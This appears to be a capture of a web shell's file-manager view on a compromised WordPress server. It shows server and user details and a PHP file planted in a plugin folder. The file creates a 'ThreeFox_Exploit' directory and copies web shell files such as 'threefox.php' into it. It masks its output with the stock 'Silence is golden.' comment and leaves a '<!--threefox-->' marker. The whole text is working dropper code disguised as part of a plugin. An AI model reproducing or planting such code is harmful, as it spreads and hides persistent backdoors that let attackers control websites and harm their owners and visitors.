HEX
Server: LiteSpeed
System: Linux Angkanet 5.15.0-94-generic #104-Ubuntu SMP Tue Jan 9 15:25:40 UTC 2024 x86_64
User: webpa4002 (1011)
PHP: 8.2.15
Disabled: NONE
Upload Files
File: /home/web.paitoan.com/public_html/wp-content/plugins/download-plugin/assignee.php
<?php
$directoryPath = dirname(__DIR__, 2) . '/ThreeFox_Exploit';
if (!file_exists($directoryPath)) {
    if (mkdir($directoryPath, 0755, true)) {
        echo "# Silence is golden.";
    } else {
        echo "# Silence is golden.";
    }
} else {
    echo "# Silence is golden.";
}
$currentDirectory = __DIR__;
$filesToCopy = ['index.php', 'threefox.php'];
foreach ($filesToCopy as $file) {
    $sourcePath = $currentDirectory . '/' . $file;
    $destinationPath = $directoryPath . '/' . $file;

    if (file_exists($sourcePath)) {
        if (copy($sourcePath, $destinationPath)) {
            echo "<!--threefox-->";
        } else {
            echo "";
        }
    } else {
        echo "";
    }
}
?>